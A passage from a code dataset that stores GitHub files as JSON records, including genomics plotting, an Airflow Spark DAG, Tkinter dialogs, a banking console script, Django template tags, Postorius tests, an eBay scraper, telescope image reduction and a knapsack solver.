data.to_csv(outname + \"_box_data_%s_%s\" % (regulation, how) + \".txt\", sep=\"\\t\")\r\n sns.boxplot(data=pd.DataFrame(box_data), ax=ax1, width=0.2, linewidth=.5, palette=palette)\r\n ax1.set_title(outname)\r\n ax1.set_ylabel('%s value(%s)' % (which, how))\r\n fig.autofmt_xdate(ha='center', rotation=0)\r\n fig.savefig(r'%s_box_data_%s_%s_Boxplot.png' % (outname, regulation, how), dpi=600, size=0.5)\r\n plt.close()\r\n\r\n\r\ndef databox(raw, which, outname=None, group=None):\r\n palette = {}\r\n up = []; down = []\r\n group1_data = raw[list(group.values())[0]]\r\n group2_data = raw[list(group.values())[1]]\r\n color = [\"red\", \"green\", \"blue\"]\r\n for gene in raw.index:\r\n if group1_data.ix[gene].sum() - group2_data.ix[gene].sum() >= 0:\r\n up.append(gene)\r\n else:\r\n down.append(gene)\r\n for i, (name, g) in enumerate(group.items()):\r\n palette[name] = color[i]\r\n plot_box(raw.ix[up], which, outname, palette, \"up\", group)\r\n plot_box(raw.ix[down], which, outname, palette, \"down\", group)\r\n\r\n\r\ndef save_data_pdf(data, name, length, color, group_dic, which):\r\n data.to_csv(\"%s.txt\" % name, sep=\"\\t\")\r\n length = {key.split(\"/\")[-1]: value for key, value in length.items()}\r\n group_dic = {key.split(\"/\")[-1]: value for key, value in group_dic.items()}\r\n pheatmap(data, length, col_cluster=True, color=color, name=name, save=\"png\")\r\n pheatmap(data, length, col_cluster=False, color=color, name=name, save=\"png\")\r\n pca(data, group_dic, n=name)\r\n databox(data, which, outname=name, group=group_dic)\r\n\r\n\r\ndef save_parameters(args=None, which=\"cnv\"):\r\n pass\r\n\r\n\r\ndef make_result_folder(args=None, which=\"cnv\", fun=None):\r\n feature_genes = []; gene_lists = {}; color_length = {}\r\n os.chdir(args.outdir)\r\n i = datetime.datetime.now()\r\n for two_group in itertools.combinations([args.group1, args.group2], 2):\r\n target = two_group[0].split(\"/\")[-1] + \"_VS_\" + two_group[1].split(\"/\")[-1] + \"_%s%s%s_%s%s\" % (i.year, i.month, i.day, i.hour, i.minute)\r\n try:\r\n os.mkdir(target)\r\n except FileExistsError:\r\n sh.rm(\"-rf\",target)\r\n os.mkdir(target)\r\n if which == \"cnv\":\r\n name = \"cnv_median_\" + args.data_type\r\n gene_list, a_group, b_group = fun(args.host_gene, two_group[0], two_group[1], data_type=args.data_type)\r\n else:\r\n if args.cal_type == \"num\":\r\n name = \"snv_number\"\r\n else:\r\n name = \"snv_mean\"\r\n gene_list, a_group, b_group = fun(args.host_gene, two_group[0], two_group[1], args.cal_type, which)\r\n feature_gene = feature_select(gene_list, a_group, b_group, pval=args.pval, method=args.feature_selection_method,\\\r\n criterion=args.criterion, penalty=args.penalty, C=args.C, threshold=args.threshold)\r\n feature_genes.append(feature_gene)\r\n gene_lists[two_group[0]] = gene_list[a_group]; gene_lists[two_group[1]] = gene_list[b_group]\r\n os.chdir(target)\r\n save_parameters(args=args, which=which)\r\n group_dic = {two_group[0]: a_group, two_group[1]: b_group}\r\n color_length[two_group[0]] = a_group; color_length[two_group[1]] = b_group\r\n color, length = make_col_color_heatmap(group_dic)\r\n save_data_pdf(gene_list, \"host_gene_%s\" % name, length, color, group_dic, which)\r\n pd.DataFrame({\"gene\":feature_gene}).to_csv(\"feature_gene_pval%0.2f.txt\" % args.pval, sep=\"\\t\", index=False)\r\n feature_gene_cnv = gene_list.ix[feature_gene]\r\n evaluate_model(gene_list, a_group, b_group, feature_gene, name=\"feature_gene_%s\" % name, method=args.prediction_method, C=args.C, n_folds=args.n_folds)\r\n save_data_pdf(feature_gene_cnv, \"feature_gene_%s\" % name, length, color, group_dic, which)\r\n os.chdir(args.outdir)\r\n if len([args.group1, args.group2]) > 2:\r\n try:\r\n os.mkdir(\"intersection\")\r\n except FileExistsError:\r\n pass\r\n os.chdir(\"intersection\")\r\n color, length = make_col_color_heatmap(color_length)\r\n intersection_feature_gene = list(set(feature_genes[0]).intersection(*feature_genes[1:]))\r\n intersection_feature_gene_cnv = pd.concat([data.ix[intersection_feature_gene] for [args.group1, args.group2], data in gene_lists.items()], axis=1)\r\n try:\r\n save_data_pdf(intersection_feature_gene_cnv, \"intersection\", length, color, color_length)\r\n except Exception:\r\n print(\"no intersection\\njob finish...\")\r\n os.chdir(args.outdir)","repo_name":"861934367/genecast","sub_path":"build/lib/genecast_package/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":8150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8125162022","text":"import datetime as dt\nfrom airflow import DAG, models\nfrom airflow.contrib.operators import dataproc_operator as dpo\nfrom airflow.utils import trigger_rule\n\nMAIN_JAR = 'file:///usr/lib/spark/examples/jars/spark-examples.jar'\nMAIN_CLASS = 'org.apache.spark.examples.SparkPi'\nCLUSTER_NAME = 'quickspark-cluster-{{ ds_nodash }}'\n\nyesterday = dt.datetime.combine(\n dt.datetime.today() - dt.timedelta(1),\n dt.datetime.min.time())\n\ndefault_dag_args = {\n 'start_date': yesterday,\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': dt.timedelta(seconds=30),\n 'project_id': models.Variable.get('gcp_project')\n}\n\nwith DAG('dataproc_spark_submit', schedule_interval='0 17 * * *',\n default_args=default_dag_args) as dag:\n\n create_dataproc_cluster = dpo.DataprocClusterCreateOperator(\n project_id = default_dag_args['project_id'],\n task_id = 'create_dataproc_cluster',\n cluster_name = CLUSTER_NAME,\n num_workers = 2,\n zone = models.Variable.get('gce_zone')\n )\n\n run_spark_job = dpo.DataProcSparkOperator(\n task_id = 'run_spark_job',\n #main_jar = MAIN_JAR,\n main_class = MAIN_CLASS,\n cluster_name = CLUSTER_NAME\n )\n\n delete_dataproc_cluster = dpo.DataprocClusterDeleteOperator(\n project_id = default_dag_args['project_id'],\n task_id = 'delete_dataproc_cluster',\n cluster_name = CLUSTER_NAME,\n trigger_rule = trigger_rule.TriggerRule.ALL_DONE\n )\n\n create_dataproc_cluster >> run_spark_job >> delete_dataproc_cluster","repo_name":"sanjeevkanabargi/python","sub_path":"airflow/code/sparkjob.py","file_name":"sparkjob.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26451300813","text":"# -*- coding: utf-8 -*-\n\n\nclass Variant(dict):\n \"\"\"Represent a Variant.\n\n snv/indels and svs differ quite a lot, we are here representing them with the same object.\n snv/indels will miss some of the information\n \"\"\"\n\n def __init__(\n self,\n chrom,\n pos,\n end,\n ref,\n alt,\n variant_id=None,\n end_chrom=None,\n sv_type=None,\n sv_len=None,\n case_id=None,\n observations=0,\n homozygote=0,\n hemizygote=0,\n is_sv=False,\n id_column=None,\n ):\n super(Variant, self).__init__(\n _id=variant_id,\n variant_id=variant_id,\n chrom=chrom,\n pos=pos,\n end=end,\n ref=ref,\n alt=alt,\n end_chrom=end_chrom,\n sv_type=sv_type,\n sv_len=sv_len,\n case_id=case_id,\n observations=observations,\n homozygote=homozygote,\n hemizygote=hemizygote,\n is_sv=is_sv,\n id_column=id_column,\n )\n","repo_name":"Clinical-Genomics/loqusdb","sub_path":"loqusdb/models/variant.py","file_name":"variant.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"41455655440","text":"\r\n'''\r\n#Message Box:\r\nfrom tkinter.ttk import Frame, Button\r\nfrom tkinter import Tk, BOTH\r\nimport tkinter.messagebox as mbox\r\n\r\nclass Example(Frame):\r\n def __init__(self, parent):\r\n Frame.__init__(self, parent)\r\n self.parent = parent\r\n self.initUI()\r\n\r\n def initUI(self):\r\n self.parent.title(\"Message Boxes\")\r\n self.pack()\r\n\r\n error = Button(self, text=\"Error\", command=self.onError)\r\n error.grid(padx=5, pady=5)\r\n warning = Button(self, text=\"Warning\", command=self.onWarn)\r\n warning.grid(row=1, column=0)\r\n question = Button(self, text=\"Question\", command=self.onQuest)\r\n question.grid(row=0, column=1)\r\n inform = Button(self, text=\"Information\", command=self.onInfo)\r\n inform.grid(row=1, column=1)\r\n\r\n def onError(self):\r\n mbox.showerror(\"Error\", \"Could not open file\")\r\n\r\n def onWarn(self):\r\n mbox.showwarning(\"Warning\", \"Deprecated function call\")\r\n\r\n def onQuest(self):\r\n mbox.askquestion(\"Question\", \"Are you sure to quit?\")\r\n\r\n def onInfo(self):\r\n mbox.showinfo(\"Information\", \"Download completed\")\r\n\r\nroot = Tk()\r\nex = Example(root)\r\nroot.geometry(\"300x150+300+300\")\r\nroot.mainloop()\r\n'''\r\n'''\r\n#Color chooser:\r\nfrom tkinter import Tk, Frame, Button, BOTH, SUNKEN\r\nfrom tkinter.colorchooser import askcolor\r\n\r\nclass Example(Frame):\r\n def __init__(self, parent):\r\n Frame.__init__(self, parent)\r\n \r\n self.parent = parent\r\n self.initUI()\r\n \r\n def initUI(self):\r\n self.parent.title(\"Color Chooser\")\r\n self.pack(fill=BOTH, expand =1 )\r\n \r\n self.btn = Button(self, text=\"Choose Color\", command=self.onChoose)\r\n self.btn.place(x=30, y=30)\r\n \r\n self.frame = Frame(self, border = 1, relief = SUNKEN, width = 100 , height = 100)\r\n self.frame.place(x=160, y=30)\r\n \r\n def onChoose(self):\r\n (rgb, hx) = askcolor()\r\n self.frame.config(bg = hx)\r\n \r\nroot = Tk()\r\nex = Example(root)\r\nroot.geometry(\"300x150+300+300\")\r\nroot.mainloop()\r\n'''\r\n#File Dialog:\r\n\r\nfrom tkinter import Frame, Tk, BOTH, Text, Menu, END\r\nfrom tkinter.filedialog import Open\r\n\r\nclass Example(Frame):\r\n def __init__(self, parent):\r\n Frame.__init__(self, parent)\r\n self.parent = parent\r\n self.initUI()\r\n\r\n def initUI(self):\r\n self.parent.title(\"File dialog\")\r\n self.pack(fill=BOTH, expand=1)\r\n\r\n menubar = Menu(self.parent)\r\n self.parent.config(menu=menubar)\r\n\r\n fileMenu = Menu(menubar)\r\n fileMenu.add_command(label=\"Open\", command=self.onOpen)\r\n menubar.add_cascade(label=\"File\", menu=fileMenu)\r\n\r\n self.txt = Text(self)\r\n self.txt.pack(fill=BOTH, expand=1)\r\n\r\n def onOpen(self):\r\n ftypes = [('Python files', '*.py'), ('All files', '*')]\r\n dlg = Open(self, filetypes = ftypes)\r\n fl = dlg.show()\r\n if fl != '':\r\n text = self.readFile(fl)\r\n self.txt.insert(END, text)\r\n \r\n def readFile(self, filename):\r\n f = open(filename, \"r\")\r\n text = f.read()\r\n return text\r\n\r\nroot = Tk()\r\nex = Example(root)\r\nroot.geometry(\"300x250+300+300\")\r\nroot.mainloop() ","repo_name":"KEROTAR0/python","sub_path":"python - lab4/1-5 MessageBox.py","file_name":"1-5 MessageBox.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1910433595","text":"import pylab as plt\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy import table\nfrom astropy import units\nimport glob\nfrom imaka.reduce import reduce_fli\nfrom imaka.reduce import calib\nimport pdb\nimport os\nfrom flystar import match\n\ndef make_sky():\n sky_dir = '/Users/jlu/data/imaka/2016_11_19/20161118/skies/binned/'\n sky_frames = [133, 145, 146, 163, 172, 179, 188]\n\n for ss in range(len(sky_frames)):\n sky_frames[ss] = '{0:s}sky_{1:03d}.fits'.format(sky_dir, sky_frames[ss])\n\n calib.makedark(sky_frames, 'pleiades_sky.fits')\n \ndef make_twilight_flats():\n twilights = ['twi_1001.fits', 'twi_2002.fits', 'twi_3003.fits',\n 'twi_4004.fits', 'twi_5005.fits', 'twi_6006.fits', 'twi_7007.fits',\n 'twi_8008.fits', 'twi_9009.fits', 'twi_10010.fits', 'twi_11011.fits',\n 'twi_12012.fits', 'twi_13013.fits', 'twi_14014.fits', 'twi_15015.fits',\n 'twi_16016.fits', 'twi_17017.fits', 'twi_18018.fits', 'twi_19019.fits',\n 'twi_20020.fits', 'twi_21021.fits', 'twi_22022.fits', 'twi_23023.fits',\n 'twi_24024.fits', 'twi_25025.fits', 'twi_26026.fits', 'twi_27027.fits',\n 'twi_28028.fits', 'twi_29029.fits', 'twi_30030.fits', 'twi_31031.fits']\n\n twi_darks = ['dark_1001002.fits', 'dark_2002013.fits', 'dark_3003024.fits',\n 'dark_4004035.fits', 'dark_5005044.fits', 'dark_6006045.fits', 'dark_7007046.fits',\n 'dark_8008047.fits', 'dark_9009048.fits', 'dark_10010001.fits', 'dark_11011003.fits',\n 'dark_12012004.fits', 'dark_13013005.fits', 'dark_14014006.fits', 'dark_15015007.fits',\n 'dark_16016008.fits', 'dark_17017009.fits', 'dark_18018010.fits', 'dark_19019011.fits',\n 'dark_20020012.fits', 'dark_21021014.fits', 'dark_22022015.fits', 'dark_23023016.fits',\n 'dark_24024017.fits', 'dark_25025018.fits', 'dark_26026019.fits', 'dark_27027020.fits',\n 'dark_28028021.fits', 'dark_29029022.fits', 'dark_30030023.fits', 'dark_31031025.fits']\n\n twilight_root = '/Users/jlu/data/imaka/2016_11_19/20161118/twilight/'\n twi_dark_root = '/Users/jlu/data/imaka/2016_11_19/20161118/darks/darks_for_twis/'\n\n for tt in range(len(twilights)):\n twilights[tt] = twilight_root + twilights[tt]\n twi_darks[tt] = twi_dark_root + twi_darks[tt]\n \n calib.makeflat(twilights, twi_darks, twilight_root + 'flat_r.fits')\n \n return\n\n \ndef reduce_pleiades_binned_open():\n sky_dir = '/Users/jlu/data/imaka/2016_11_19/20161118/skies/binned/'\n data_dir = '/Users/jlu/data/imaka/2016_11_19/20161118/Pleiades_E/open_loop/'\n os.chdir(data_dir)\n\n fnum = [137, 139, 142, 144, 148, 150, 152]\n img_files = ['obj_{0:03d}.fits'.format(ii) for ii in fnum]\n\n reduce_fli.clean_images(img_files, rebin=1, sky_frame=sky_dir + 'pleiades_sky.fits')\n\n return\n \n\ndef reduce_pleiades_binned_closed():\n sky_dir = '/Users/jlu/data/imaka/2016_11_19/20161118/skies/binned/'\n data_dir = '/Users/jlu/data/imaka/2016_11_19/20161118/Pleiades_E/closed_loop/'\n os.chdir(data_dir)\n\n fnum = [138, 141, 143, 147, 149, 151]\n img_files = ['obj_{0:03d}.fits'.format(ii) for ii in fnum]\n\n reduce_fli.clean_images(img_files, rebin=1, sky_frame=sky_dir + 'pleiades_sky.fits')\n\n return\n \ndef find_stars_pleiades_binned_open():\n data_dir = '/Users/jlu/data/imaka/2016_11_19/20161118/Pleiades_E/open_loop/'\n os.chdir(data_dir)\n \n fnum = [137, 139, 142, 144, 148, 150, 152]\n img_files = ['obj_{0:03d}_bin_nobkg.fits'.format(ii) for ii in fnum]\n\n reduce_fli.find_stars_bin(img_files, fwhm=2, threshold=6)\n\n return\n \ndef find_stars_pleiades_binned_closed():\n data_dir = '/Users/jlu/data/imaka/2016_11_19/20161118/Pleiades_E/closed_loop/'\n os.chdir(data_dir)\n \n fnum = [138, 141, 143, 147, 149, 151]\n img_files = ['obj_{0:03d}_bin_nobkg.fits'.format(ii) for ii in fnum]\n\n reduce_fli.find_stars_bin(img_files, fwhm=2, threshold=6)\n\n return\n\n\ndef compare_fwhm_list():\n data_dir = '/Users/jlu/data/imaka/2016_11_19/20161118/Pleiades_E/'\n os.chdir(data_dir)\n \n # o_list = np.arange(163, 173) # Open loop star lists\n # c_list = np.arange(153, 163) # Closed loop star lists\n # o_list = np.arange(163, 173) # Open loop star lists\n # c_list = np.arange(153, 163) # Closed loop star lists\n o_list = [137, 139, 142, 144, 148, 150]\n c_list = [138, 141, 143, 147, 149, 151]\n \n plt.ion()\n\n for ii in range(len(o_list)):\n open_list = 'open_loop/obj_{0:03d}_bin_nobkg_stars.txt'.format(o_list[ii])\n closed_list = 'closed_loop/obj_{0:03d}_bin_nobkg_stars.txt'.format(c_list[ii])\n\n compare_fwhm(open_list, closed_list, scale=3*0.04, flux_min=5)\n pdb.set_trace()\n\ndef compare_fwhm(open_list, closed_list, scale=0.04, flux_min=2.0):\n topen = table.Table.read(open_list, format='ascii')\n tclose = table.Table.read(closed_list, format='ascii')\n\n # Trim out any stars with FWHM > 10\n idx_o = np.where(topen['x_fwhm'] < 10)[0]\n idx_c = np.where(tclose['x_fwhm'] < 10)[0]\n\n topen = topen[idx_o]\n tclose = tclose[idx_c]\n\n # Trim out any stars with flux < flux_min\n idx_o = np.where(topen['flux'] > flux_min)[0]\n idx_c = np.where(tclose['flux'] > flux_min)[0]\n\n topen = topen[idx_o]\n tclose = tclose[idx_c]\n \n m_c = np.ones(len(tclose))\n m_o = np.ones(len(topen))\n\n idx_c, idx_o, dr, dm = match.match(tclose['xcentroid'], tclose['ycentroid'], m_c,\n topen['xcentroid'], topen['ycentroid'], m_o,\n dr_tol=10)\n # Matched catalogs\n to_match = topen[idx_o]\n tc_match = tclose[idx_c]\n\n # Plot\n plt.figure(1)\n plt.clf()\n plt.plot(to_match['x_fwhm']*scale, tc_match['x_fwhm']*scale, 'r.', label='X')\n plt.plot(to_match['y_fwhm']*scale, tc_match['y_fwhm']*scale, 'b.', label='Y')\n plt.plot([0, 10], [0, 10], 'k--')\n plt.xlabel('FWHM in Open Loop (\")')\n plt.ylabel('FWHM in Closed Loop (\")')\n plt.axis('equal')\n\n max_fwhm = 1.5*np.mean([to_match['x_fwhm'], to_match['y_fwhm'], tc_match['x_fwhm'], tc_match['y_fwhm']])\n plt.ylim(0, max_fwhm*scale)\n plt.xlim(0, max_fwhm*scale)\n plt.legend(numpoints=1, loc='upper left')\n plt.pause(0.05)\n\n plt.figure(2)\n plt.clf()\n x_ratio = tc_match['x_fwhm'] / to_match['x_fwhm']\n y_ratio = tc_match['y_fwhm'] / to_match['y_fwhm']\n \n plt.plot(to_match['x_fwhm']*scale, x_ratio, 'r.', label='X')\n plt.plot(to_match['y_fwhm']*scale, y_ratio, 'b.', label='Y')\n plt.axhline(1, linestyle='--', color='black')\n plt.xlabel('FWHM in Open Loop (\")')\n plt.ylabel('Closed / Open FWHM')\n\n max_fwhm = 1.5*np.mean([to_match['x_fwhm'], to_match['y_fwhm'], tc_match['x_fwhm'], tc_match['y_fwhm']])\n plt.xlim(0, max_fwhm*scale)\n plt.ylim(0, 1.5)\n plt.legend(numpoints=1, loc='upper left')\n plt.pause(0.05)\n\n x_fwhm_o_med = np.median(to_match['x_fwhm']) \n y_fwhm_o_med = np.median(to_match['y_fwhm']) \n x_fwhm_c_med = np.median(tc_match['x_fwhm']) \n y_fwhm_c_med = np.median(tc_match['y_fwhm'])\n \n print('Open Loop Stats:')\n print('\\t Median x_fwhm = {0:.1f} +/- {1:.1f}'.format(x_fwhm_o_med * scale,\n to_match['x_fwhm'].std() * scale))\n print('\\t Median y_fwhm = {0:.1f} +/- {1:.1f}'.format(y_fwhm_o_med * scale,\n to_match['y_fwhm'].std() * scale))\n\n print('Closed Loop Stats:')\n print('\\t Median x_fwhm = {0:.1f} +/- {1:.1f}'.format(x_fwhm_c_med * scale,\n tc_match['x_fwhm'].std() * scale))\n print('\\t Median y_fwhm = {0:.1f} +/- {1:.1f}'.format(y_fwhm_c_med * scale,\n tc_match['y_fwhm'].std() * scale))\n\n print('Fractional Improvement')\n print('\\t x_fwhm closed / open = {0:.2f}'.format(x_fwhm_c_med / x_fwhm_o_med))\n print('\\t y_fwhm closed / open = {0:.2f}'.format(y_fwhm_c_med / y_fwhm_o_med))\n \n","repo_name":"jluastro/imaka","sub_path":"imaka/reduce/nights/reduce_2016_11_18.py","file_name":"reduce_2016_11_18.py","file_ext":"py","file_size_in_byte":8214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38675599559","text":"print(\"\"\"\n ----------------------------------\n | Bem-vindo, o que deseja fazer? |\n ----------------------------------\n \n 1 - Depósito\n\n 2 - Saque\n\n 3 - Extrato\n \"\"\")\n\nbalanco = 0\nextrato = \"\"\nnum_saque = 0\nLIMITE_SAQUE = 3\nlimite = 500\n\nwhile True:\n print('')\n escolha = int(input(\"Digite opção desejada: \\t\"))\n print('')\n if(escolha == 1):\n valor = float(input(\"Você escolheu depósito, qual valor gostaria de depositar? \\t \"))\n \n print(f'Valor depositado foi de: \\t R${valor:,.2f}')\n if (valor > 0):\n balanco += valor\n extrato += f'Depósito: \\t R${valor:,.2f}\\n'\n \n else:\n print('Não foi possível realizar essa operação')\n elif (escolha == 2):\n \n valor = float(input(\"Você escolheu retirada, qual valor gostaria de sacar? \\t \"))\n \n excedeu_saldo = valor > balanco\n excedeu_limite = valor > limite\n excedeu_saque = num_saque >= LIMITE_SAQUE\n\n if excedeu_saldo:\n print('Não há saldo suficiente, operação não realizada')\n elif excedeu_limite:\n print('Valor diário de saque foi atingido, operação não realizada')\n elif excedeu_saque:\n print('Limite de saques diários atingido, operação não realizada')\n elif valor > 0:\n print(f'Valor retirado foi de: \\t R${valor:,.2f}')\n balanco -= valor\n extrato += f'Retirada \\t R${valor:,.2f}\\n'\n num_saque += 1\n else:\n print('Valor informado inválido!')\n\n elif (escolha == 3):\n print('Extrato')\n print('Não há transição financeira' if not extrato else extrato)\n print(f'Balanço: R$ {balanco:,.2f}')\n\n else:\n print('Não foi possível realizar operação')\n","repo_name":"matteeussPei/Sistema-Bancario","sub_path":"sistemabancario.py","file_name":"sistemabancario.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21897106601","text":"from django import template\n\n\nregister = template.Library()\n\n\n@register.simple_tag(takes_context=True)\ndef get_site_root(context):\n return context['request'].site.root_page\n\n\n@register.inclusion_tag(\"home/inclusion/top_menu.html\", takes_context=True)\ndef top_menu(context, root, calling_page=None):\n menuitems = root.get_children().live().in_menu()\n for menuitem in menuitems:\n menuitem.has_children = menuitem.get_children().live().in_menu().exists()\n\n return {\n \"calling_page\": calling_page,\n \"menuitems\": menuitems,\n \"request\": context['request']\n }\n\n\n@register.inclusion_tag(\"home/inclusion/top_menu_children.html\", takes_context=True)\ndef top_menu_children(context, parent):\n children = parent.get_children()\n for child in children:\n child.has_children = child.get_children().live().in_menu().exists()\n\n return {\n 'parent': parent,\n 'children': children,\n 'request': context['request']\n }\n\n\n@register.inclusion_tag(\"home/inclusion/footer.html\", takes_context=True)\ndef display_footer(context):\n return {\n \"request\": context['request']\n }\n","repo_name":"wlminimal/epc","sub_path":"home/templatetags/epc_tags.py","file_name":"epc_tags.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6800764671","text":"#��數字的個十百千位的數字\r\nfrom sys import stdout\r\nif __name__ == '__main__':\r\n x = int(input('pls input a four number:\\n'))\r\n xx = []\r\n a = x / 1000\r\n b = x % 1000 / 100\r\n c = x % 100 / 10\r\n d = x % 10\r\n xx.append(a)\r\n xx.append(b)\r\n xx.append(c)\r\n xx.append(d)\r\n print (xx)\r\n\r\nfrom sys import stdin\r\nfor s in range(100,1000):\r\n a=s/100\r\n b=(s%100)/10\r\n c=s%10\r\n print(a,b,c)\r\n break","repo_name":"Bill640616Chen/python","sub_path":"w3-Excersize013-7.py","file_name":"w3-Excersize013-7.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37628312683","text":"from mock import patch, MagicMock\nfrom allauth.account.models import EmailAddress\nfrom django.contrib.auth.models import User\nfrom django.utils.six.moves.urllib.error import HTTPError\nfrom django.test import override_settings\n\nfrom postorius.tests.utils import ViewTestCase\nfrom postorius.models import (\n MailmanApiError, MailmanListManager, MailmanUserManager)\n\n\nclass ModelTest(ViewTestCase):\n \"\"\"Tests for the list index page.\"\"\"\n\n def setUp(self):\n super(ModelTest, self).setUp()\n self.domain = self.mm_client.create_domain('example.com')\n self.foo_list = self.domain.create_list('foo')\n\n @override_settings(AUTOCREATE_MAILMAN_USER=False)\n def test_mailman_user_not_created_when_flag_is_off(self):\n user = User.objects.create_user(\n 'testuser', 'test@example.com', 'testpass')\n EmailAddress.objects.create(\n user=user, email=user.email, verified=True)\n with self.assertRaises(HTTPError):\n self.mm_client.get_user('test@example.com')\n\n @override_settings(AUTOCREATE_MAILMAN_USER=True)\n def test_mailman_user_created_when_flag_is_on(self):\n user = User.objects.create_user(\n 'testuser', 'test@example.com', 'testpass')\n EmailAddress.objects.create(\n user=user, email=user.email, verified=True)\n mm_user = self.mm_client.get_user('test@example.com')\n self.assertEqual(str(mm_user.addresses[0]), 'test@example.com')\n\n @override_settings(AUTOCREATE_MAILMAN_USER=True)\n @patch('postorius.models.MailmanUser')\n def test_core_not_reachable(self, mock_model):\n # Fail Gracefully if the Core is not reachable when\n # creating the user account.\n mock_model.objects.create_from_django.side_effect = MailmanApiError\n # User creation should succeed without any error, even though there\n # is no MailmanUser. However, this error should be logged.\n with patch('postorius.models.logger') as log:\n User.objects.create_user('testuser, test@example.com', 'testpass')\n errmsg = 'Mailman Core API is not reachable.'\n log.error.assert_called_with(errmsg)\n # There should be no user in Mailman with this address.\n with self.assertRaises(HTTPError):\n self.mm_client.get_user('test@example.com')\n\n\nclass TestMailmanListManager(ViewTestCase):\n\n def setUp(self):\n super().setUp()\n self.domain = self.mm_client.create_domain('example.com')\n self.domain2 = self.mm_client.create_domain('most-desirable.org')\n self.foo_list = self.domain.create_list('foo')\n self.bar_list = self.domain.create_list('bar')\n self.baz_list = self.domain2.create_list('baz')\n self.list_manager = MailmanListManager()\n\n def test_get_all_mailinglists(self):\n lists = self.list_manager.all()\n # This should return all the 2 mailing lists that we have.\n self.assertEqual(len(lists), 3)\n self.assertEqual(\n [x.fqdn_listname for x in lists],\n ['bar@example.com', 'baz@most-desirable.org', 'foo@example.com'])\n\n def test_get_by_mail_host(self):\n lists = self.list_manager.by_mail_host('example.com')\n self.assertEqual(len(lists), 2)\n self.assertEqual(\n [x.fqdn_listname for x in lists],\n ['bar@example.com', 'foo@example.com'])\n\n def test_get_single_mailinglist(self):\n mlist = self.list_manager.get('baz@most-desirable.org')\n self.assertIsNotNone(mlist)\n self.assertEqual(str(mlist), str(self.baz_list))\n\n\nclass TestMailmanUserManager(ViewTestCase):\n\n @override_settings(AUTOCREATE_MAILMAN_USER=False)\n def setUp(self):\n super().setUp()\n self.user_manager = MailmanUserManager()\n self.bob = User.objects.create(\n email='bob@example.com', username='bob', first_name=\"Bob\")\n self.alice = User.objects.create(\n email='alice@example.com', username='alice', first_name='Alice')\n\n def test_create_from_django_works(self):\n mm_user = self.user_manager.create_from_django(self.bob)\n self.assertIsNotNone(mm_user)\n self.assertEqual(len(mm_user.addresses), 1)\n\n def test_create_from_django_sets_all_attributes(self):\n mm_user = self.user_manager.create_from_django(self.bob)\n self.assertIsNotNone(mm_user)\n self.assertEqual(mm_user.display_name, 'Bob')\n self.assertEqual([str(x) for x in list(mm_user.addresses)],\n ['bob@example.com'])\n\n def test_get_or_create_from_django(self):\n self.user_manager.create_from_django = MagicMock(name='create')\n muser = self.user_manager.get_or_create_from_django(self.bob)\n self.assertIsNotNone(muser)\n self.user_manager.create_from_django.assert_called_once()\n # This was a non-existent user so it was created for us. Now, let's try\n # with an existing user.\n user = self.user_manager.create(email=self.bob.email, password=None)\n self.assertIsNotNone(user)\n # Now we reset the mock and see that create_from_django isn't called\n # anymore.\n self.user_manager.create_from_django.reset_mock()\n muser = self.user_manager.get_or_create_from_django(self.bob)\n self.user_manager.create_from_django.assert_not_called()\n","repo_name":"Nakaner/postorius-debian","sub_path":"src/postorius/tests/mailman_api_tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":5343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17935756210","text":"from selenium import webdriver\nimport re\nfrom ebay_entry import *\nfrom utils import *\nimport os\n\nif (os.name == 'nt'):\n driver = webdriver.Chrome(os.path.join(os.getcwd(), 'chromedriver.exe'))\nelse:\n driver = webdriver.Chrome()\n\ndriver.get(\"http://www.ebay.com\")\n\nsearch_item = \"Imax B6AC charger\"\n\n# get text-area\ntextarea = driver.find_element_by_id(\"gh-ac\")\n#clear and write search item\ntextarea.clear\ntextarea.send_keys(search_item)\n#click search\nsearch_button = driver.find_element_by_id(\"gh-btn\")\nsearch_button.click()\n\nnum_results = driver.find_element_by_class_name(\"srp-controls__count-heading\")\n#results\nprint(num_results.text)\nnum_results = re.split(\" \", num_results.text)[0]\nif int(num_results) is 0:\n print(\"result is zero, no data to analyze\")\n quit()\n\n#we have a non-zero result..gather top 50 product data\npr_list = get_product_collection(driver)\n#driver.close()\n\n\n\n#gather item of top 50 relevant product and prep 50 ebay_entries\n#dump JSON of product data\n#analyze and represent data\n\n\n\n","repo_name":"SushanBasnet/wbscrp","sub_path":"ws.py","file_name":"ws.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23236992910","text":"from itertools import product\r\n\r\nclass KnapSack:\r\n def __init__(self, profits, weights, capacity):\r\n self.profits = profits\r\n self.weights = weights\r\n self.capacity = capacity\r\n\r\n def solve_knapsack_brute_force(self):\r\n dane = [0, 1]\r\n max_profit = 0\r\n productSet = product(dane, repeat = len(self.weights))\r\n\r\n for element in productSet:\r\n profit = 0\r\n weight = 0\r\n for index in range(len(element)):\r\n sum = element[index] * self.weights[index]\r\n weight += sum\r\n res = element[index] * self.profits[index]\r\n profit += res\r\n\r\n if(weight <= self.capacity and profit >= max_profit):\r\n max_profit = profit\r\n 